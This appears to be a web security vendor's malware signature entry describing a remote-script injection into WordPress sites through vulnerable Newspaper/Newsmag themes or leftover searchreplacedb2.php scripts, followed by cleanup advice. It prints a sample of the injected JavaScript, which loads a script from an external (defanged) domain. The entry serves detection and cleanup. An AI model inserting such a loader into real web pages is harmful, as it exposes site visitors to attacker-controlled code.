Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.injection.27

Description:

Injection of a remote script typically made either via vulnerabilities in Newspaper/Newsmag themes or via abandoned searchreplacedb2.php scripts.

Sample

<script type="text/javascript">var t = document.createElement("script"); t.type = "text/javascript" t.src = "hxxps://mp.trymynewspirit[.]com/s.js" document.head.appendChild(t);</script>
Domain names changes frequently.

Cleanup

In case of Newsmag/Newspaper infection, the malicious code should typically be removed from the "Ads" and "Custom Javascript" settings of the theme. Theme should be updated to prevent reinfections.

In case of the searchreplacedb2.php infection vector, the script should be removed from WordPress posts and from various options in the wp_options table. If you are using some database search and replace tool, make sure it correctly works with serialized data, otherwise it make break the site.



Affecting: As of 2017, mostly WordPress sites.

For more information read our blogpost


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb